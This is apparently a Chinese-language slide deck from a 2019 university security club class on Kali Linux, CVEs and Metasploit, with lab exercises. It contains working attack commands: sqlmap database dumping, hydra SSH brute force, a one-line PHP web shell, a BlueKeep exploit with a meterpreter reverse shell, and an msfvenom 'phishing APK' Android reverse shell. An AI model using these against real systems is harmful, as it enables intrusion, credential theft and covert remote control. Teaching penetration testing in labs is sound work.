Metasploit & Kali 

NISRA 2019.12.03

By Halloworld

黃品翰

  • 輔仁大學資工三乙
  • NISRA副會長
  • 常以 halloworld自稱

虛擬機記得裝

在 Z:\NISRA\20191202_kali_metasploit底下

  • kali.ova
  • win7 (SP1) vdi(這個有點大)
  • Virtual box ...
  • 共三個檔案
  • 共筆有設定教學文

Warning

Outline

  • Kali Linux Intro
  • CVE
  • Metasploit

What is kali?

  • 駭客的好工具

  • 用於數位鑑識和滲透測試

  • 基於Debian的Linux發行版

A lot of Tools

Web滲透測試工具

Nmap

Nmap

  • $nmap -sP 192.168.0.0/16
    • 掃描該網域有回應的ip
  • $nmap -sT <target ip>
    • 掃描該server有開的port

!!!請不要拿學校網路來nmap,否則你會被Ban!!!

dnsmap

  • 能夠探測該域名子域名

$ dnsmap <url> -w /usr/share/wordlists/dnsmap.txt

Sqlmap

  • 能用來測試 Sql-injection
  • 拿到 SQL裡的資料???
  • 取得後台權限???
  • SQL-injection懶人包

DirBuster

  • 暴力枚舉該網域下的目錄
  • 找後臺?
  • 找到意想不到的東東???

Lab

beef.nisra.net:8000

註冊帳號,請開始你的表演

Lab 0x01

  • 枚舉該網域下的檔案(.txt)
  • Flag在某一個裡面
  • 格式為NISRA{xxxxxx}

Pentester Lab-

from SQLi to Shell(1)

1. nmap 找開啟的服務

2. 如何登入 (回憶 SQLi)

SQLMAP 練習

 //查看有哪些DB
sqlmap -u "http://<ip>/cat.php?id=1" --dbs --batch
 //查看photoblog裡有甚麼表
sqlmap -u "http://<ip>/cat.php?id=1" -D photoblog --tables --batch
 //User? 有帳號密碼資訊????
sqlmap -u "http://<ip>/cat.php?id=1" -D photoblog -T users --batch --dump

破密工具

Crunch

  • 生成密碼本,可依照關鍵字去找出所有排列組合

!!請小心你的硬碟會被撐爆!!

Crunch用法

$ crunch <length_start> <length_end> <key_word> -o <file>

ex: crunch 5 8 nisra -o pw.txt

ex: crunch 7 7 -t nisra%% -o pw.txt

% 代表數字

@ 代表小寫英文字母

Hydra

  • 暴力破解好工具
  • 支援許多協議
  • ftp, http, ssh, mysql...

Lab0x02

破解ssh key

 hydra -l <user> -P <password_file> <ip> -t <task> ssh

hint pw: nisra**

無法破解ssh?

如何拿shell??

上傳web shell

<pre>
<?php echo shell_exec($_GET['cmd']);?>
</pre>

index.Php

Aircrack-NG

f

  • 標準的網路安全分析軟體
  • 網路偵測、封包嗅探、WEP/WPA/WPA2
  • 只支援有監聽功能的網卡

CVE

(Common Vulnerabilities and Exposures)

通用漏洞披漏(常見弱點和漏洞)

CVE - YYYY - NNNN

Rule

CVE - (西元分)- (流水號)

  • 內容: 利用windows漏洞 (MS17-010)永恆之藍
  • 影響範圍: windows 7版本之前
  • 受感染的電腦會有大量檔案被加密,並且要求高價比特幣贖金

Wannacry

(CVE-2017-0143~0148)

BlueKeep

(CVE-2019-0708)

BlueKeep

(CVE-2019-0708)

  • 受影響用戶

    • windows7 / server2008 ~2013
  • 遭害者風險會遭遠端執行任意程式碼的風險(RCE)

  • 利用遠端桌面連線協定連上系統,傳送惡意呼叫

CVE-2019-0708

CVE-2019-0708

CVE-2019-0708

Recommend

Metasploit

安全漏洞的檢測工具

Metasploit

安全漏洞的檢測工具

  • 一個免費、開源的滲透測試框架

  • 由H.D.Moore 於2003年發布

  • 使用Ruby語言編寫,目前是世界上最大滲透測試資料庫

基本用法

  • 啟動: msfconsole

  • 查詢漏洞: search <漏洞名稱>

  • 選擇漏洞: use <漏洞檔案>

找exploit

(以CVE 2019-0708做舉例)

匯入exploit

cve_2019_0708_bluekeep_rce.rb

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //選擇exploit
show options //查看設定參數
set rhosts <target_ip> //設定被害者的ip
set GROOMSIZE 50 
set payload windows/x64/meterpreter/reverse_tcp //設定攻擊payload
set lhost <your_ip>
set target 2// windows7 SP1 VBOX
run //攻擊腳本執行

Meterpreter

  • 破解成功之後的後門程式

  • 添加一個用戶,隱藏一些東西,打開shell等

  • windows/Linux/Android....都有支援

進化版,影響版本擴及到win10

不過metasploit的script還沒出

製作釣魚apk

msfvenom –p android/meterpreter/reverse_tcp 
LHOST=<your_ip> LPORT=<port>  > <file>

Android Reverse shell

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <your_ip>
exploit

技術總結

  • Kali工具多到爆,有興趣可以自行研究

  • 常常關注CVE, Metasploit的最新動態

  • 台灣有法律,好自為之

[2019NISRA_Class] Kali & Metasploit

By halloworld

[2019NISRA_Class] Kali & Metasploit

  • 300
Loading comments...

More from halloworld